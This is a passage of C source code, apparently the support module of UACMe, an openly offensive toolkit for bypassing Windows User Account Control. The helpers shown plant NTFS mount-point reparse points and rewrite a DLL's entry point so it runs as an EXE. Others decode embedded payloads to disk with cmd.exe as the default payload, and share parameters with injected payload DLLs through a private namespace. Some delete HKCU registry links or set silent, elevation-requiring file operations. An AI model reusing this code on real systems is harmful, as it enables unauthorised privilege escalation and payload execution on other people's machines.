status = NtFsControlFile(hDirectory,
NULL,
NULL,
NULL,
&IoStatusBlock,
FSCTL_DELETE_REPARSE_POINT,
&Buffer,
REPARSE_GUID_DATA_BUFFER_HEADER_SIZE,
NULL,
0);
if (status == STATUS_NOT_A_REPARSE_POINT) {
SetLastError(ERROR_INVALID_PARAMETER);
}
else {
supSetLastErrorFromNtStatus(status);
}
return NT_SUCCESS(status);
}
/*
* supSetMountPoint
*
* Purpose:
*
* Install reparse point of type mount_point to target.
*
*/
BOOL supSetMountPoint(
_In_ HANDLE hDirectory,
_In_ LPCWSTR lpTarget,
_In_ LPCWSTR lpPrintName
)
{
ULONG memIO;
USHORT cbTarget, cbPrintName, reparseDataLength;
NTSTATUS status;
IO_STATUS_BLOCK IoStatusBlock;
REPARSE_DATA_BUFFER* Buffer;
if ((lpTarget == NULL) || (lpPrintName == NULL)) {
SetLastError(ERROR_INVALID_PARAMETER);
return FALSE;
}
//
// Calculate required buffer size.
// Header + length of input strings + safe space.
//
cbTarget = (USHORT)(_strlen(lpTarget) * sizeof(WCHAR));
cbPrintName = (USHORT)(_strlen(lpPrintName) * sizeof(WCHAR));
reparseDataLength = cbTarget + cbPrintName + 12;
memIO = (ULONG)(reparseDataLength + REPARSE_DATA_BUFFER_HEADER_LENGTH);
Buffer = (REPARSE_DATA_BUFFER*)supHeapAlloc((SIZE_T)memIO);
if (Buffer == NULL)
return FALSE;
//
// Setup reparse point structure.
//
Buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
Buffer->ReparseDataLength = reparseDataLength;
//
// Add Target to PathBuffer.
//
Buffer->MountPointReparseBuffer.SubstituteNameOffset = 0;
Buffer->MountPointReparseBuffer.SubstituteNameLength = cbTarget;
RtlCopyMemory(Buffer->MountPointReparseBuffer.PathBuffer,
lpTarget,
cbTarget);
//
// Add PrintName to PathBuffer.
//
Buffer->MountPointReparseBuffer.PrintNameOffset = cbTarget + sizeof(UNICODE_NULL);
Buffer->MountPointReparseBuffer.PrintNameLength = cbPrintName;
RtlCopyMemory(&Buffer->MountPointReparseBuffer.PathBuffer[(cbTarget / sizeof(WCHAR)) + 1],
lpPrintName,
cbPrintName);
//
// Set reparse point.
//
status = NtFsControlFile(hDirectory,
NULL,
NULL,
NULL,
&IoStatusBlock,
FSCTL_SET_REPARSE_POINT,
Buffer,
memIO,
NULL,
0);
supHeapFree(Buffer);
supSetLastErrorFromNtStatus(status);
return NT_SUCCESS(status);
}
/*
* supOpenDirectoryForReparse
*
* Purpose:
*
* Open directory handle to set reparse point.
*
*/
HANDLE supOpenDirectoryForReparse(
_In_ LPCWSTR lpDirectory
)
{
NTSTATUS status = STATUS_UNSUCCESSFUL;
HANDLE hReparseDirectory = NULL;
UNICODE_STRING usReparseDirectory;
IO_STATUS_BLOCK IoStatusBlock;
OBJECT_ATTRIBUTES ObjectAttributes;
usReparseDirectory.Buffer = NULL;
if (RtlDosPathNameToNtPathName_U(lpDirectory, &usReparseDirectory, NULL, NULL)) {
InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = NtCreateFile(&hReparseDirectory,
FILE_ALL_ACCESS,
&ObjectAttributes,
&IoStatusBlock,
NULL,
0,
FILE_SHARE_READ | FILE_SHARE_WRITE,
FILE_OPEN,
FILE_OPEN_REPARSE_POINT | FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0);
RtlFreeUnicodeString(&usReparseDirectory);
}
supSetLastErrorFromNtStatus(status);
return hReparseDirectory;
}
/*
* supWinstationToName
*
* Purpose:
*
* Retrieves winstation string name.
*
*/
BOOL supWinstationToName(
_In_opt_ HWINSTA hWinsta,
_In_ LPWSTR lpBuffer,
_In_ DWORD cbBuffer,
_Out_ PDWORD BytesNeeded
)
{
HWINSTA hObject;
if (hWinsta == NULL)
hObject = GetProcessWindowStation();
else
hObject = hWinsta;
return GetUserObjectInformation(
hObject,
UOI_NAME,
lpBuffer,
cbBuffer,
BytesNeeded);
}
/*
* supDesktopToName
*
* Purpose:
*
* Retrieves desktop string name.
*
*/
BOOL supDesktopToName(
_In_opt_ HDESK hDesktop,
_In_ LPWSTR lpBuffer,
_In_ DWORD cbBuffer,
_Out_ PDWORD BytesNeeded
)
{
HDESK hObject;
if (hDesktop == NULL)
hObject = GetThreadDesktop(GetCurrentThreadId());
else
hObject = hDesktop;
return GetUserObjectInformation(
hObject,
UOI_NAME,
lpBuffer,
cbBuffer,
BytesNeeded);
}
/*
* supReplaceDllEntryPoint
*
* Purpose:
*
* Replace DLL entry point and optionally convert dll to exe.
*
*/
BOOL supReplaceDllEntryPoint(
_In_ PVOID DllImage,
_In_ ULONG SizeOfDllImage,
_In_ LPCSTR lpEntryPointName,
_In_ BOOL fConvertToExe
)
{
BOOL bResult = FALSE;
PIMAGE_NT_HEADERS NtHeaders;
DWORD DllVirtualSize;
PVOID DllBase, EntryPoint;
NtHeaders = RtlImageNtHeader(DllImage);
if (NtHeaders) {
DllVirtualSize = 0;
DllBase = PELoaderLoadImage(DllImage, &DllVirtualSize);
if (DllBase) {
//
// Get the new entrypoint.
//
EntryPoint = PELoaderGetProcAddress(DllBase, (PCHAR)lpEntryPointName);
if (EntryPoint) {
//
// Set new entrypoint and recalculate checksum.
//
NtHeaders->OptionalHeader.AddressOfEntryPoint =
(ULONG)((ULONG_PTR)EntryPoint - (ULONG_PTR)DllBase);
if (fConvertToExe)
NtHeaders->FileHeader.Characteristics &= ~IMAGE_FILE_DLL;
NtHeaders->OptionalHeader.CheckSum =
supCalculateCheckSumForMappedFile(DllImage, SizeOfDllImage);
bResult = TRUE;
}
VirtualFree(DllBase, 0, MEM_RELEASE);
}
}
return bResult;
}
/*
* supQuerySystemRoot
*
* Purpose:
*
* Query system root value from registry to the program global context.
*
*/
BOOL supQuerySystemRoot(
_Inout_ PVOID Context)
{
BOOL bResult = FALSE, needBackslash = FALSE;
NTSTATUS Status;
UNICODE_STRING UString;
OBJECT_ATTRIBUTES ObjectAttributes;
PWCHAR lpData = NULL;
SIZE_T ccm = 0, cch = 0;
HANDLE hKey = NULL;
PUACMECONTEXT context = (PUACMECONTEXT)Context;
WCHAR szBuffer[MAX_PATH];
WCHAR szSystem32Prep[] = { L's', L'y', L's', L't', L'e', L'm', L'3', L'2', L'\\', 0 };
ULONG Length = 0, cbSystem32Prep = sizeof(szSystem32Prep) - sizeof(WCHAR);
do {
_strcpy(szBuffer, T_REGISTRY_PREP);
_strcat(szBuffer, T_WINDOWS_CURRENT_VERSION);
RtlInitUnicodeString(&UString, szBuffer);
InitializeObjectAttributes(&ObjectAttributes, &UString, OBJ_CASE_INSENSITIVE, NULL, NULL);
Status = NtOpenKey(&hKey, KEY_READ, &ObjectAttributes);
if (!NT_SUCCESS(Status))
break;
Status = supRegReadValue(hKey, L"SystemRoot", REG_SZ, (PVOID*)&lpData, &Length, context->ucmHeap);
if (!NT_SUCCESS(Status) || (lpData == NULL))
break;
cch = _strlen(lpData);
if (cch == 0) {
SetLastError(ERROR_INVALID_DATA);
break;
}
needBackslash = (lpData[cch - 1] != L'\\');
ccm = cch + (needBackslash ? 1 : 0) + (cbSystem32Prep / sizeof(WCHAR));
if (ccm >= MAX_PATH) {
SetLastError(ERROR_BUFFER_OVERFLOW);
break;
}
_strncpy(context->szSystemRoot, MAX_PATH, lpData, cch + 1);
if (needBackslash) {
context->szSystemRoot[cch] = L'\\';
context->szSystemRoot[cch + 1] = UNICODE_NULL;
}
_strcpy(context->szSystemDirectory, context->szSystemRoot);
_strcat(context->szSystemDirectory, szSystem32Prep);
bResult = TRUE;
} while (FALSE);
if (hKey) NtClose(hKey);
if (lpData) RtlFreeHeap(context->ucmHeap, 0, lpData);
return bResult;
}
#define SI_MAX_BUFFER_LENGTH (512 * 1024 * 1024)
/*
* supGetSystemInfo
*
* Purpose:
*
* Returns buffer with system information by given InfoClass.
*
* Returned buffer must be freed with supHeapFree after usage.
*
*/
PVOID supGetSystemInfo(
_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass
)
{
PVOID buffer = NULL;
ULONG bufferSize = PAGE_SIZE;
NTSTATUS ntStatus;
ULONG returnedLength = 0;
buffer = supHeapAlloc((SIZE_T)bufferSize);
if (buffer == NULL)
return NULL;
while ((ntStatus = NtQuerySystemInformation(
SystemInformationClass,
buffer,
bufferSize,
&returnedLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
supHeapFree(buffer);
bufferSize *= 2;
if (bufferSize > SI_MAX_BUFFER_LENGTH)
return NULL;
buffer = supHeapAlloc((SIZE_T)bufferSize);
if (buffer == NULL)
return NULL;
}
if (NT_SUCCESS(ntStatus)) {
return buffer;
}
if (buffer)
supHeapFree(buffer);
return NULL;
}
/*
* supIsCorImageFile
*
* Purpose:
*
* Return true if image has CliHeader entry, false otherwise.
*
*/
BOOL supIsCorImageFile(
_In_ PVOID ImageBase
)
{
ULONG sz = 0;
IMAGE_COR20_HEADER* CliHeader;
CliHeader = (IMAGE_COR20_HEADER*)RtlImageDirectoryEntryToData(ImageBase, TRUE,
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, &sz);
return ((CliHeader != NULL) && (sz >= sizeof(IMAGE_COR20_HEADER)));
}
/*
* supCreateDirectory
*
* Purpose:
*
* Native create directory.
*
*/
NTSTATUS supCreateDirectory(
_Out_opt_ PHANDLE phDirectory,
_In_ OBJECT_ATTRIBUTES* ObjectAttributes,
_In_ ULONG DirectoryShareFlags,
_In_ ULONG DirectoryAttributes
)
{
NTSTATUS status;
HANDLE DirectoryHandle = NULL;
IO_STATUS_BLOCK IoStatusBlock;
if (DirectoryAttributes == 0)
DirectoryAttributes = FILE_ATTRIBUTE_NORMAL;
status = NtCreateFile(
&DirectoryHandle,
FILE_GENERIC_WRITE,
ObjectAttributes,
&IoStatusBlock,
NULL,
DirectoryAttributes,
DirectoryShareFlags,
FILE_OPEN_IF,
FILE_DIRECTORY_FILE,
NULL,
0);
if (NT_SUCCESS(status)) {
if (phDirectory)
*phDirectory = DirectoryHandle;
}
return status;
}
/*
* supxCreateBoundaryDescriptorSID
*
* Purpose:
*
* Create special SID to access isolated namespace.
*
*/
PSID supxCreateBoundaryDescriptorSID(
SID_IDENTIFIER_AUTHORITY* SidAuthority,
UCHAR SubAuthorityCount,
ULONG* SubAuthorities
)
{
BOOL bResult = FALSE;
ULONG i;
PSID pSid = NULL;
do {
pSid = supHeapAlloc(RtlLengthRequiredSid(SubAuthorityCount));
if (pSid == NULL)
break;
if (!NT_SUCCESS(RtlInitializeSid(pSid, SidAuthority, SubAuthorityCount)))
break;
for (i = 0; i < SubAuthorityCount; i++)
*RtlSubAuthoritySid(pSid, i) = SubAuthorities[i];
bResult = TRUE;
} while (FALSE);
if (bResult == FALSE) {
if (pSid) supHeapFree(pSid);
pSid = NULL;
}
return pSid;
}
/*
* supCreateSharedParametersBlock
*
* Purpose:
*
* Create parameters block to be shared with payload dlls.
*
*/
BOOL supCreateSharedParametersBlock(
_In_ PVOID ucmContext)
{
BOOL bResult = FALSE;
ULONG r;
HANDLE hBoundary = NULL;
PVOID SharedBuffer = NULL;
SIZE_T ViewSize;
PUACMECONTEXT context = (PUACMECONTEXT)ucmContext;
LARGE_INTEGER liSectionSize;
PSID pWorldSid = NULL;
SID_IDENTIFIER_AUTHORITY SidWorldAuthority = SECURITY_WORLD_SID_AUTHORITY;
UNICODE_STRING usName;
OBJECT_ATTRIBUTES obja = RTL_INIT_OBJECT_ATTRIBUTES((PUNICODE_STRING)NULL, 0);
UACME_PARAM_BLOCK ParamBlock;
ULONG SubAuthoritiesWorld[] = { SECURITY_WORLD_RID };
WCHAR szBoundaryDescriptorName[128];
WCHAR szObjectName[128];
RtlSecureZeroMemory(&szBoundaryDescriptorName, sizeof(szBoundaryDescriptorName));
supGenerateSharedObjectName((WORD)AKAGI_BDESCRIPTOR_NAME_ID, szBoundaryDescriptorName);
RtlInitUnicodeString(&usName, szBoundaryDescriptorName);
//
// Fill parameters block.
//
RtlSecureZeroMemory(&ParamBlock, sizeof(ParamBlock));
if (context->OptionalParameterLength != 0) {
_strncpy(ParamBlock.szParameter, MAX_PATH,
context->szOptionalParameter, MAX_PATH);
}
ParamBlock.AkagiFlag = context->AkagiFlag;
ParamBlock.SessionId = NtCurrentPeb()->SessionId;
supWinstationToName(NULL, ParamBlock.szWinstation, MAX_PATH * 2, &r);
supDesktopToName(NULL, ParamBlock.szDesktop, MAX_PATH * 2, &r);
do {
//
// Create and assign boundary descriptor.
//
hBoundary = RtlCreateBoundaryDescriptor(&usName, 0);
if (hBoundary == NULL)
break;
pWorldSid = supxCreateBoundaryDescriptorSID(
&SidWorldAuthority,
1,
SubAuthoritiesWorld);
if (pWorldSid == NULL)
break;
if (!NT_SUCCESS(RtlAddSIDToBoundaryDescriptor(&hBoundary, pWorldSid))) {
break;
}
//
// Create private namespace.
//
if (!NT_SUCCESS(NtCreatePrivateNamespace(
&context->SharedContext.hIsolatedNamespace,
MAXIMUM_ALLOWED,
&obja,
hBoundary)))
{
break;
}
obja.Attributes = OBJ_CASE_INSENSITIVE;
obja.RootDirectory = context->SharedContext.hIsolatedNamespace;
obja.ObjectName = &usName;
//
// Create completion event.
//
RtlSecureZeroMemory(&szObjectName, sizeof(szObjectName));
supGenerateSharedObjectName((WORD)AKAGI_COMPLETION_EVENT_ID, szObjectName);
RtlInitUnicodeString(&usName, szObjectName);
_strcpy(ParamBlock.szSignalObject, szObjectName);
//
// Param block is complete. Calc crc32.
//
ParamBlock.Crc32 = RtlComputeCrc32(0, &ParamBlock, sizeof(ParamBlock));
if (!NT_SUCCESS(NtCreateEvent(
&context->SharedContext.hCompletionEvent,
EVENT_ALL_ACCESS,
&obja,
NotificationEvent,
FALSE)))
{
break;
}
//
// Create shared section.
//
liSectionSize.QuadPart = PAGE_SIZE;
ViewSize = PAGE_SIZE;
RtlSecureZeroMemory(&szObjectName, sizeof(szObjectName));
supGenerateSharedObjectName((WORD)AKAGI_SHARED_SECTION_ID, szObjectName);
RtlInitUnicodeString(&usName, szObjectName);
if (NT_SUCCESS(NtCreateSection(
&context->SharedContext.hSharedSection,
SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_QUERY,
&obja,
&liSectionSize,
PAGE_READWRITE,
SEC_COMMIT,
NULL)))
{
//
// Write data to shared section.
//
if (NT_SUCCESS(NtMapViewOfSection(
context->SharedContext.hSharedSection,
NtCurrentProcess(),
&SharedBuffer,
0,
PAGE_SIZE,
NULL,
&ViewSize,
ViewUnmap,
MEM_TOP_DOWN,
PAGE_READWRITE)))
{
RtlSecureZeroMemory(SharedBuffer, PAGE_SIZE);
RtlCopyMemory(SharedBuffer, &ParamBlock, sizeof(ParamBlock));
NtUnmapViewOfSection(NtCurrentProcess(), SharedBuffer);
bResult = TRUE;
}
}
} while (FALSE);
//
// Cleanup.
//
if (pWorldSid)
supHeapFree(pWorldSid);
if (hBoundary)
RtlDeleteBoundaryDescriptor(hBoundary);
if (bResult == FALSE) {
if (context->SharedContext.hIsolatedNamespace) {
NtDeletePrivateNamespace(context->SharedContext.hIsolatedNamespace);
NtClose(context->SharedContext.hIsolatedNamespace);
}
}
return bResult;
}
/*
* supDestroySharedParametersBlock
*
* Purpose:
*
* Free shared resources.
*
*/
VOID supDestroySharedParametersBlock(
_In_ PVOID ucmContext)
{
PUACMECONTEXT context = (PUACMECONTEXT)ucmContext;
if (context->SharedContext.hIsolatedNamespace) {
if (context->SharedContext.hCompletionEvent)
NtClose(context->SharedContext.hCompletionEvent);
if (context->SharedContext.hSharedSection)
NtClose(context->SharedContext.hSharedSection);
NtDeletePrivateNamespace(context->SharedContext.hIsolatedNamespace);
NtClose(context->SharedContext.hIsolatedNamespace);
}
}
/*
* supCreateUacmeContext
*
* Purpose:
*
* Allocate and fill program contexts.
*
*/
PVOID supCreateUacmeContext(
_In_ ULONG Method,
_In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,
_In_ ULONG OptionalParameterLength,
_In_ PVOID DecompressRoutine
)
{
BOOLEAN IsWow64;
ULONG Seed, NtBuildNumber = 0;
PUACMECONTEXT Context;
HANDLE ContextHeap = NtCurrentPeb()->ProcessHeap;
#ifdef _UCM_CONSOLE
HMODULE hNtdll;
#endif
RTL_OSVERSIONINFOW osv;
UNREFERENCED_PARAMETER(Method);
if (OptionalParameterLength > MAX_PATH)
return NULL;
IsWow64 = supIsProcess32bit(NtCurrentProcess());
RtlSecureZeroMemory(&osv, sizeof(osv));
osv.dwOSVersionInfoSize = sizeof(osv);
RtlGetVersion((PRTL_OSVERSIONINFOW)&osv);
NtBuildNumber = osv.dwBuildNumber;
if (NtBuildNumber < NT_WIN7_RTM) {
return NULL;
}
Context = RtlAllocateHeap(ContextHeap, HEAP_ZERO_MEMORY, sizeof(UACMECONTEXT));
if (Context == NULL) {
return NULL;
}
//
// Create private heap, enable termination on corruption.
//
Context->ucmHeap = RtlCreateHeap(HEAP_GROWABLE, NULL, 0, 0, NULL, NULL);
if (Context->ucmHeap == NULL) {
RtlFreeHeap(ContextHeap, 0, Context);
return NULL;
}
RtlSetHeapInformation(Context->ucmHeap, HeapEnableTerminationOnCorruption, NULL, 0);
//
// Set Fubuki flag.
//
Context->AkagiFlag = AKAGI_FLAG_KILO;
//
// Remember NtBuildNumber.
//
Context->dwBuildNumber = NtBuildNumber;
//
// Set Cookie for supEncode/DecodePointer.
//
Seed = USER_SHARED_DATA->Cookie;
Context->Cookie = RtlRandomEx((PULONG)&Seed);
//
// Remember Wow64 process state.
//
Context->IsWow64 = IsWow64;
//
// Save OptionalParameter if present.
//
if (OptionalParameterLength) {
_strncpy(Context->szOptionalParameter, MAX_PATH,
OptionalParameter, OptionalParameterLength);
Context->OptionalParameterLength = OptionalParameterLength;
}
//
// Set IFileOperations flags.
//
if (NtBuildNumber > 14997) {
Context->IFileOperationFlags = FOF_NOCONFIRMATION |
FOFX_NOCOPYHOOKS |
FOFX_REQUIREELEVATION;
}
else {
Context->IFileOperationFlags = FOF_NOCONFIRMATION |
FOF_SILENT |
FOFX_SHOWELEVATIONPROMPT |
FOFX_NOCOPYHOOKS |
FOFX_REQUIREELEVATION;
}
//
// Query basic directories.
//
// 1. SystemRoot
// 2. System32
if (!supQuerySystemRoot(Context)) {
RtlDestroyHeap(Context->ucmHeap);
RtlFreeHeap(ContextHeap, 0, Context);
return NULL;
}
// 3. Temp
supExpandEnvironmentStrings(L"%temp%\\", Context->szTempDirectory, MAX_PATH);
// 4. Current directory
if (GetCurrentDirectory(MAX_PATH, Context->szCurrentDirectory) < MAX_PATH) {
supPathAddBackSlash(Context->szCurrentDirectory);
}
//
// Default payload path.
//
_strcpy(Context->szDefaultPayload, Context->szSystemDirectory);
_strcat(Context->szDefaultPayload, CMD_EXE);
Context->DecompressRoutine = (pfnDecompressPayload)supDecodePointer(DecompressRoutine);
#ifdef _UCM_CONSOLE
hNtdll = GetModuleHandle(L"ntdll.dll");
if (hNtdll) {
Context->swprintf_s = (pswprintf_s)GetProcAddress(hNtdll, "swprintf_s");
}
#else
Context->swprintf_s = (PVOID)-1;
#endif
return (PVOID)Context;
}
/*
* supDestroyUacmeContext
*
* Purpose:
*
* Destroy program contexts.
*
*/
VOID supDestroyUacmeContext(
_In_ PVOID Context
)
{
PUACMECONTEXT context = (PUACMECONTEXT)Context;
RtlDestroyHeap(context->ucmHeap);
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Context);
}
/*
* supDecodeAndWriteBufferToFile
*
* Purpose:
*
* Create new file and write decoded buffer to it.
*
*/
BOOL supDecodeAndWriteBufferToFile(
_In_ LPWSTR lpFileName,
_In_ CONST PVOID Buffer,
_In_ DWORD BufferSize,
_In_ ULONG Key
)
{
BOOL bResult;
PVOID p;
SIZE_T Size = ALIGN_UP_BY(BufferSize, PAGE_SIZE);
p = supVirtualAlloc(&Size, DEFAULT_ALLOCATION_TYPE | MEM_TOP_DOWN, DEFAULT_PROTECT_TYPE, NULL);
if (p) {
RtlCopyMemory(p, Buffer, BufferSize);
EncodeBuffer(p, BufferSize, Key);
bResult = supWriteBufferToFile(lpFileName, p, BufferSize);
supSecureVirtualFree(p, Size, NULL);
return bResult;
}
return FALSE;
}
/*
* supEnableDisableWow64Redirection
*
* Purpose:
*
* Enable/Disable Wow64 redirection.
*
*/
NTSTATUS supEnableDisableWow64Redirection(
_In_ BOOL bDisable
)
{
PVOID OldValue = NULL, Value;
if (bDisable)
Value = IntToPtr(TRUE);
else
Value = IntToPtr(FALSE);
return RtlWow64EnableFsRedirectionEx(Value, &OldValue);
}
/*
* supGetProcessDebugObject
*
* Purpose:
*
* Reference process debug object.
*
*/
NTSTATUS supGetProcessDebugObject(
_In_ HANDLE ProcessHandle,
_Out_ PHANDLE DebugObjectHandle)
{
return NtQueryInformationProcess(
ProcessHandle,
ProcessDebugObjectHandle,
DebugObjectHandle,
sizeof(HANDLE),
NULL);
}
/*
* supIsProcessRunning
*
* Purpose:
*
* Return TRUE if the given process is running in current session.
*
*/
BOOL supIsProcessRunning(
_In_ LPWSTR ProcessName
)
{
BOOL bResult = FALSE;
ULONG nextEntryDelta = 0;
PVOID processList;
UNICODE_STRING lookupPsName;
union {
PSYSTEM_PROCESS_INFORMATION Processes;
PBYTE ListRef;
} List;
processList = supGetSystemInfo(SystemProcessInformation);
if (processList == NULL)
return bResult;
List.ListRef = (PBYTE)processList;
RtlInitUnicodeString(&lookupPsName, ProcessName);
do {
List.ListRef += nextEntryDelta;
if (List.Processes->SessionId == NtCurrentPeb()->SessionId) {
if (RtlEqualUnicodeString(&lookupPsName,
&List.Processes->ImageName,
TRUE))
{
bResult = TRUE;
break;
}
}
nextEntryDelta = List.Processes->NextEntryDelta;
} while (nextEntryDelta);
supHeapFree(processList);
return bResult;
}
/*
* supBinTextEncode
*
* Purpose:
*
* Create pseudo random string from UI64 value.
*
*/
VOID supBinTextEncode(
_In_ unsigned __int64 x,
_Inout_ wchar_t* s
)
{
char tbl[64];
char c = 0;
int p;
tbl[62] = '-';
tbl[63] = '_';
for (c = 0; c < 26; ++c)
{
tbl[c] = 'A' + c;
tbl[26 + c] = 'a' + c;
if (c < 10)
tbl[52 + c] = '0' + c;
}
for (p = 0; p < 13; ++p)
{
c = x & 0x3f;
x >>= 5;
*s = (wchar_t)tbl[c];
++s;
}
*s = 0;
}
/*
* supGenerateSharedObjectName
*
* Purpose:
*
* Create pseudo random object name from it ID.
*
*/
VOID supGenerateSharedObjectName(
_In_ WORD ObjectId,
_Inout_ LPWSTR lpBuffer
)
{
ULARGE_INTEGER value;
value.LowPart = MAKELONG(
MAKEWORD(UCM_VERSION_BUILD, UCM_VERSION_REVISION),
MAKEWORD(UCM_VERSION_MINOR, UCM_VERSION_MAJOR));
value.HighPart = MAKELONG(UACME_SHARED_BASE_ID, ObjectId);
supBinTextEncode(value.QuadPart, lpBuffer);
}
/*
* supSetGlobalCompletionEvent
*
* Purpose:
*
* Set global completion event state to signaled.
*
*/
VOID supSetGlobalCompletionEvent(
VOID)
{
if (g_ctx->SharedContext.hCompletionEvent) {
SetEvent(g_ctx->SharedContext.hCompletionEvent);
}
}
/*
* supWaitForGlobalCompletionEvent
*
* Purpose:
*
* Wait a little bit for things to complete.
*
*/
NTSTATUS supWaitForGlobalCompletionEvent(
VOID)
{
LARGE_INTEGER liDueTime;
if (g_ctx->SharedContext.hCompletionEvent) {
#ifdef _DEBUG
liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(10000, 10000);
#else
liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(50000, 10000);
#endif
return NtWaitForSingleObject(g_ctx->SharedContext.hCompletionEvent, FALSE, &liDueTime);
}
return STATUS_WAIT_0;
}
/*
* supOpenClassesKey
*
* Purpose:
*
* Open required subkey of current user.
*
*/
NTSTATUS supOpenClassesKey(
_In_opt_ PUNICODE_STRING UserRegEntry,
_Out_ PHANDLE KeyHandle
)
{
UNICODE_STRING usRootKey, usKeyName;
HANDLE rootKeyHandle = NULL, keyHandle = NULL;
OBJECT_ATTRIBUTES obja;
NTSTATUS ntStatus;
ULONG dummy;
*KeyHandle = NULL;
if (UserRegEntry == NULL) {
ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);
if (!NT_SUCCESS(ntStatus))
return ntStatus;
}
else {
RtlCopyMemory(&usRootKey, UserRegEntry, sizeof(UNICODE_STRING));
}
InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);
ntStatus = NtOpenKey(&rootKeyHandle, MAXIMUM_ALLOWED, &obja);
if (!NT_SUCCESS(ntStatus)) {
RtlFreeUnicodeString(&usRootKey);
return ntStatus;
}
RtlInitUnicodeString(&usKeyName, T_SOFTWARE_CLASSES);
obja.ObjectName = &usKeyName;
obja.RootDirectory = rootKeyHandle;
ntStatus = NtCreateKey(&keyHandle,
MAXIMUM_ALLOWED,
&obja,
0,
NULL,
REG_OPTION_NON_VOLATILE,
&dummy);
if (NT_SUCCESS(ntStatus))
*KeyHandle = keyHandle;
NtClose(rootKeyHandle);
if (UserRegEntry == NULL)
RtlFreeUnicodeString(&usRootKey);
return ntStatus;
}
/*
* supRemoveRegLinkHKCU
*
* Purpose:
*
* Remove registry symlink for current user.
*
*/
NTSTATUS supRemoveRegLinkHKCU(
_In_ LPWSTR lpszRegLink
)
{
NTSTATUS status = STATUS_UNSUCCESSFUL;
ULONG cbKureND;
UNICODE_STRING usCurrentUser, usLinkPath;
OBJECT_ATTRIBUTES obja;
UNICODE_STRING CmSymbolicLinkValue = RTL_CONSTANT_STRING(L"SymbolicLinkValue");
PWSTR lpLinkKeyBuffer = NULL;
SIZE_T memIO;
HANDLE hKey = NULL;
cbKureND = (ULONG)(_strlen(lpszRegLink)) * sizeof(WCHAR);
InitializeObjectAttributes(&obja, &usLinkPath, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = RtlFormatCurrentUserKeyPath(&usCurrentUser);
if (!NT_SUCCESS(status))
return status;
do {
memIO = sizeof(UNICODE_NULL) + usCurrentUser.MaximumLength + cbKureND;
lpLinkKeyBuffer = (PWSTR)supHeapAlloc(memIO);
if (lpLinkKeyBuffer == NULL)
break;
usLinkPath.Buffer = lpLinkKeyBuffer;
usLinkPath.Length = 0;
usLinkPath.MaximumLength = (USHORT)memIO;
status = RtlAppendUnicodeStringToString(&usLinkPath, &usCurrentUser);
if (!NT_SUCCESS(status))
break;
status = RtlAppendUnicodeToString(&usLinkPath, lpszRegLink);
if (!NT_SUCCESS(status))
break;
InitializeObjectAttributes(&obja, &usLinkPath, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, NULL, NULL);
status = NtOpenKey(&hKey,
KEY_ALL_ACCESS,
&obja);
if (NT_SUCCESS(status)) {
status = NtDeleteValueKey(hKey, &CmSymbolicLinkValue);
if (NT_SUCCESS(status))
status = NtDeleteKey(hKey);
NtClose(hKey);
}
} while (FALSE);
if (lpLinkKeyBuffer) supHeapFree(lpLinkKeyBuffer);
RtlFreeUnicodeString(&usCurrentUser);
return status;
}
/*
* supFindPattern
*
* Purpose:
*
* Lookup pattern in buffer.
*
*/
PVOID supFindPattern(
_In_ CONST PBYTE Buffer,
_In_ SIZE_T BufferSize,
_In_ CONST PBYTE Pattern,
_In_ SIZE_T PatternSize
)
{
PBYTE p0 = Buffer, pnext;
if (PatternSize == 0)
return NULL;
if (BufferSize < PatternSize)
return NULL;
do {
pnext = (PBYTE)memchr(p0, Pattern[0], BufferSize);
if (pnext == NULL)
break;
BufferSize -= (ULONG_PTR)(pnext - p0);
if (BufferSize < PatternSize)
return NULL;
if (memcmp(pnext, Pattern, PatternSize) == 0)
return pnext;
p0 = pnext + 1;
--BufferSize;
} while (BufferSize > 0);
return NULL;
}
/*
* supLookupImageSectionByName
*
* Purpose:
*
* Lookup section pointer and size for section name.
*
*/
PVOID supLookupImageSectionByName(
_In_ CHAR* SectionName,
_In_ ULONG SectionNameLength,
_In_ PVOID DllBase,
_Out_ PULONG SectionSize
)
{
BOOLEAN bFound = FALSE;
ULONG i;
PVOID Section;
IMAGE_NT_HEADERS* NtHeaders = RtlImageNtHeader(DllBase);
IMAGE_SECTION_HEADER* SectionTableEntry;
//
// Assume failure.
//
if (SectionSize)
*SectionSize = 0;
if (NtHeaders == NULL)
return NULL;
SectionTableEntry = (PIMAGE_SECTION_HEADER)((PCHAR)NtHeaders +
sizeof(ULONG) +
sizeof(IMAGE_FILE_HEADER) +
NtHeaders->FileHeader.SizeOfOptionalHeader);
//
// Locate section.
//
i = NtHeaders->FileHeader.NumberOfSections;
while (i > 0) {
if (_strncmp_a(
(CHAR*)SectionTableEntry->Name,
SectionName,
SectionNameLength) == 0)
{
bFound = TRUE;
break;
}
i -= 1;
SectionTableEntry += 1;
}
//
// Section not found, abort scan.
//
if (!bFound)
return NULL;
Section = (PVOID)((ULONG_PTR)DllBase + SectionTableEntry->VirtualAddress);
if (SectionSize)
*SectionSize = SectionTableEntry->Misc.VirtualSize;
return Section;
}
/*
* supGetUserAssocSetDB
*
* Purpose:
*
* Return pointer to UAS table and optionally count of entries.
*
*/
PUSER_ASSOC_SIGNATURE supGetUserAssocSetDB(
_Out_opt_ PULONG SignatureCount
)
{
if (SignatureCount)
*SignatureCount = RTL_NUMBER_OF(g_UserAssocSignatures);
return (PUSER_ASSOC_SIGNATURE)&g_UserAssocSignatures;
}
/*
* supEnumUserAssocSetDB
*
* Purpose:
*
* Enumerate UserSetAssocDB.
*
*/
VOID supEnumUserAssocSetDB(
_In_ PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION Callback,
_In_opt_ PVOID Context
)
{
USER_ASSOC_SIGNATURE* pSignature;
ULONG i, signCount;
